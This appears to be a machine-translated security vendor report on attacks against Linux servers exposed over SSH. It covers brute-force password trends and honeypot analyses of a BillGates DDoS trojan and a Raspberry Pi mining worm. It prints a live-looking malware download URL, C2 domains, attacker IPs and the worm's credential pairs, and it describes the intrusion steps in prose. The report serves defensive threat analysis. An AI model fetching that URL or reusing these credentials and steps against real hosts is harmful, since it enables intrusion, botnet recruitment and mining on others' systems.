An overview of the
As one of the five major operating systems, Linux currently accounts for more than 80% of the server market. With the development of cloud computing and IoT, Linux, as the mainstream underlying operating system in the field of Internet of Things, will be involved in a geometric increase in application scenarios.
Arnhem brain team through long-term monitoring of global Internet information security data of all kinds of service port found that more than 50 million of the world’s exposure to Linux host SSH port, the largest amount of exposure to the United States and China, and the server will face severe attacks, such as port scanning, password blasting, vulnerability scanning, and so on. According to the observation, there is a large amount of scanning traffic on the whole network every day to detect SSH or database ports of the system. Once the detection is successful, blasting is carried out to obtain host permissions. Compromised Linux hosts are often used for mining and DDoS attacks, as well as for catching more “chickens” through Intranet worm proliferation. This phenomenon seriously affects the security of the network space. It is recommended to strengthen standardized security control of such systems and clean up zombie hosts in a timely manner in the subsequent process of network security awareness and governance.
Main points of this paper:
- More than 50 million Linux hosts in the network exposed SSH ports and suffered severe port scanning and blasting threats.
- System remote management port and database port are frequently attacked by hackers.
- Weak passwords and default passwords for proprietary devices (such as Cisco, Pi, db2as) are still preferred.
- The attack sources of Linux system are mainly concentrated in Europe, America, South Korea and other countries, and the attack systems are mostly Linux hosts.
- After the Linux host is lost, it is mostly used for mining, launching DDoS attacks and spreading worms on the Intranet to capture broilers. The most common trojans are Gates Trojan and Raspberry PI.
Serious security risks and impacts on the Linux system
The number of Linux servers exposed on the whole network is huge
The Linux operating system has always had a wide range of applications:
- As an enterprise server application
It can be used as enterprise architecture WWW server, database server, load balancing server, DNS server. In addition to reducing operating costs, it also ensures high stability and reliability of the system.
- As an embedded Linux system application system
From Internet devices (routers, switches, firewalls, load balancers) to specialized control systems (vending machines, cell phones, PDAs, various household appliances), Linux has a wide market for applications. In recent years, Linux operating system has successfully entered into the mainstream embedded development platform, infiltrating into various industries such as telecommunications, finance, education and so on. Major hardware manufacturers, large/very large Internet enterprises are using Linux system as their server-side program running platform.
In August this year, the Anheng Security Data Brain team used the Sumap platform to detect a large number of devices with SSH ports open on the Internet. The detection found that a total of 51,689,792 ports were exposed worldwide, including 11,964,730 in China.
The TOP10 geographical distribution of SSH ports exposed are as follows:
Figure 2-1 Distribution of exposed SSH ports
Figure 2-2 Distribution of exposed SSH ports
The top three SSH ports are exposed in the following regions and numbers:
14,448,205 in the United States; 11,964,730 in China; Germany has 2,710,689.
The United States and China have the largest number of open SSH ports by far. A large number of open SSH ports expose The Linux system to the Internet, greatly increasing the risks faced by the system.
Most systems are subjected to high-frequency persistent attacks
The Security Data Brain team analyzed a large number of Attacks on Linux systems, and found that a single Linux system with exposed ports suffered an average of more than 40,000 attacks per day. Hackers mostly carried out high-frequency persistent attacks, with an average attack rate of about five attacks per second.
It is found that a Linux system with a weak password is successfully hacked about 17,000 times a month. After a Linux system is successfully hacked, the system checks host information, disables the firewall, and downloads files to control the connection back to the remote C2 host, and then mines or launches DDoS attacks.
An overview of mainstream attacks
Remote control and database ports are centrally scanned
Port scanning is the most common method used by attackers to discover whether there are vulnerabilities or whether certain ports of the server are opened by scanning, and then attack the server by means of vulnerabilities or blasting.
Different countries have different targets for port scanning. The following is the analysis of port scanning in different countries:
Figure 2-3 Port scanning distribution in different countries
* Note: Ports 2222 and 2223 are often used for remote management of the system. Port 3306 is used for MYSQL; Ports 80 and 443 are common ports on the Web server. Port 25 is SMTP port.
Table 2-1 Port scanning preferences of attackers by country
Generally speaking, the ports of intrusion are concentrated in remote access and database ports. It can be seen that the scanning detection tendency of most mainstream hackers is simple and crude. For system operation and maintenance personnel, daily strict port management can avoid risks. However, according to port exposure data, some operation and maintenance personnel have little awareness of security management, leaving opportunities for hackers.
The blasting problem of weak password and default password of proprietary equipment is serious
Brute force cracking is the most common and easy way to operate. The security data brain team detected the distribution of user names and passwords involved in brute force cracking of Linux system as follows:
Figure 2-4 Common blasting user names
From the user name: root, admin, shell, enable, default and other classic weak passwords, still occupy the mainstream.
Figure 2-5 Common blasting passwords
In terms of passwords, default passwords and simple password sequences such as system, user, 1234 and sh are the most commonly used explosive passwords by hackers.
In addition to weak password, which is commonly used by hackers, default password blasting of proprietary devices is also commonly used by hackers. The default passwords of common private devices are as follows:
Table 2-2 Default accounts of dedicated devices
Compared with figure 2-4 (common blasting user names), it can be found that there are a large number of default password accounts for blasting of proprietary equipment.
To sum up, weak password blasting is one of the most popular attack methods used by hackers, which is low-cost and easy to achieve a high success rate. So for us, don’t be greedy for “instant gratification”, make passwords and user names as complex as possible, and change passwords at intervals (e.g., 30 days). Enterprise users should strengthen employees’ awareness of password management because of the greater value of data. The detection of proprietary equipment and Internet of Things facilities has become a trend, and the security management of these non-server equipment is imminent.
Attack source area features
Scanning and detecting attack sources on The Linux system From the regional perspective, Europe, China, the United States, and South Korea are the most concentrated attack sources. The distribution of attack sources in different countries is as follows:
Figure 2-6 Global distribution of Scanning detection attack sources in Linux
We track and analyze the systems used by attackers. The following figure shows the distribution of attacker systems:
Figure 2-7 System distribution of attackers
The inspection found that Linux was responsible for more than 60% of the attacks on known operating systems, including some of the zombie hosts that had been taken advantage of.
Mining and DDoS attacks are its main purposes
By tracking and observing the data of attack traffic on the Internet for a long time, the Security data brain team found that the current attacks against Linux hosts mainly focus on capturing broilers for mining and DDoS attacks. This time, two typical Trojan horses are selected for brief analysis: Gates Trojan horse and Raspberry PI Trojan Horse.
Gates Trojan Horse analysis
An overview of the
The Billgates Trojan horse is a mainstream Trojan attack in Linux. It is mainly used for DDoS attacks or mining. Here’s an analysis of recent attacks on Billgates.
Anheng Security Data Brain team captured a DDoS Trojan in a honeypot platform on July 30, 2018. The source IP is 61.178.179.93, which can launch a DDoS attack by blowing up SSH, accessing the honeypot disguised file system, and downloading a Trojan that turns the machine into an attacker’s broiler.
The Trojan horse file is as follows:
Figure 3-1 A DDoS Trojan horse file
Analysis shows that the attacker downloaded three times and succeeded once.
The invasion of the process
The attacker first explodes the open SSH service, usually through port 22, and then enters the honeypot disguised file system. After entering the system, the attacker first closes the firewall, then obtains the Trojan horse from port 45454 of the source IP address 61.178.179.93, and repeatedly starts the Trojan horse program.
Figure 3-2 Obtaining the Trojan horse from the source IP address and repeatedly starting the Trojan horse program
The Trojan download path is as follows: http://61.178.179.93:45454/Hoogp, now the path can access and download:
Figure 3-3 Access and Download page of the Trojan Horse
The Trojan, whose IP address 61.178.179.93 was downloaded from Gansu, China, had launched cyber attacks and was marked as a malware site by Anheng Threat Intelligence Center.
Figure 3-4 Details about the Trojan horse
Through the analysis of Hoogp samples, it was found to be a malicious file, and several anti-virus software also detected it as a backdoor and DDoS.
Figure 3-5 Monitoring results of multiple antivirus software
Communication behavior
We further analyzed the communication behavior of the file and found that the domain names associated with the file are xunyi-gov.cn and ddos.xunyi-gov.cn, and the domain name xunyi-gov.cn has been marked as a BillGates botnet.
There are five subdomain names under the website: blog.xunyi-gov.cn; Hack. Xunyi – gov. Cn; www.xunyi-gov.cn; DDoS. Xunyi – gov. Cn; S.x unyi – gov. Cn. Most subdomains are marked as remote or malware.
Table 3-1 Association analysis of domain name xunyi-gov.cn
Figure 3-7 Communication samples of the Trojan horse
A reverse check on another associated domain name: ddos.xunyi-gov.cn, found that it is still marked as malware communication related:
Figure 3-8 Reverse domain name check
In addition, according to the association analysis results as follows, it is found that the organization controls the communication of malicious domain names in batches and captures a large number of hosts, which is speculated to be the behavior of hacker organizations of a certain scale.
Table 3-2 Association analysis of ddos.xunyi-gov.cn domain names
Raspberry Trojan analysis
An overview of the
The Raspberry PI was introduced in 2017 as a single-chip computer, a tiny linux-based computer the size of a credit card.
On July 31, 2018, the security data brain team of Anheng found malicious files left by the attacker in a honeypot system to invade and mine the Raspberry PI system. After analyzing the logs, it was found that the attack IP was 121.153.206.110, located in South Korea.
The invasion of the process
The attacker logged into the honeypot on July 31, 2018 at 14:17:37 with the default raspberry PI account and weak password.
Figure 3-10 Attacker using a weak password to log in to the honeypot platform
By looking further at the instructions executed by the attacker, it can be found that the attacker obtained a file named “E7wWc5ku” through the SCP command and saved it under/TMP. Then go to the TMP directory to grant executable permission to the file and call the bash script to execute the file.
Behavior analysis
We then retrieved and analyzed the complete content of the Shell script, which mines after killing a bunch of other mining processes and processes that hog system resources.
Kill a bunch of other mining programs and processes:
Figure 3-11 Analyzing the attacker process
A suspicious address is then added to /etc/hosts, resolving the local address to bins. Deutschland-zahlung.eu. Then delete the environment variables set by shell and change the password information of PI user. SSH generates a public key and writes it into the SSH configuration file. Specify DNS, write a suspicious EOF MARKER file, in which there is a string of suspicious domain names, analysis believed to be IRC server;
Figure 3-12 Attacker process analysis (2)
Then, the EOF MARKER file is suspended in the background, zmap and sSHpass are downloaded, zmap is used for Intranet detection, and the current machine is continued to be utilized. With “PI: praspberry” and “PI: praspberryaspberry993311” password to scan the IP list of other machines, once scored by SCP upload scripts.
Figure 3-13 Attacker process analysis (3)
Safety management is urgent
Through the analysis of the mainstream threat situation of the current Linux system, it provides a reliable basis for the standardized management and governance of the system.
Daily security operation and maintenance specifications
From the current Internet system remote service or database port exposed, the serious situation of blasting analysis, the server system port needs to strengthen the standardized management. In daily operation and maintenance, you need to avoid opening unnecessary application ports, especially remote service ports and database applications that can be easily detected and blown up. If opening is necessary, you need to control network access and avoid attacks by illegal addresses. Standardized management of ports is easy to operate, but the results are remarkable.
Security specification for Internet of Things terminal devices
Underlying the Internet of things equipments system USES a Linux, compared to traditional server operations management, due to the short development time, management mechanism is not mature enough, the safety of this type of system is very weak, configuration management chaos, especially to the default password is particularly prominent problems, whether the past outbreaks of camera black swans, DDoS attacks launched by Internet of Things terminal devices led to the Internet outage event in the United States, which fully exposed the non-standard development, configuration and management of system security. Therefore, it is urgent to promote the device security standard management of Internet of Things terminal devices, and force the detection of product security standards.
Zombie host awareness and governance
At present in the network has been around for a lot of bots, due to lack of bots detection mechanism exist in the network, enterprise network, IDC room, all kinds of public/private cloud, face the host was charged with the fall of for a long time without self-knowledge, this phenomenon also allowed the hackers deliberately to catch chicken, DDoS, dig, Intranet, etc. Therefore, using the new zombie host detection method, the security problem of detecting whether there is system collapse in the network has become the most urgent problem to be solved at present.
Of threat information through the Internet traffic data capture and share intelligence analysis at home and abroad, which can be widely recognition in a network of bots, extracted by malicious host control the fall of the host address, can effectively assist regional regulatory unit or organization found whether there is accused of bots in the internal network, cleaning work, prevent continues to be accused of immeasurable loss.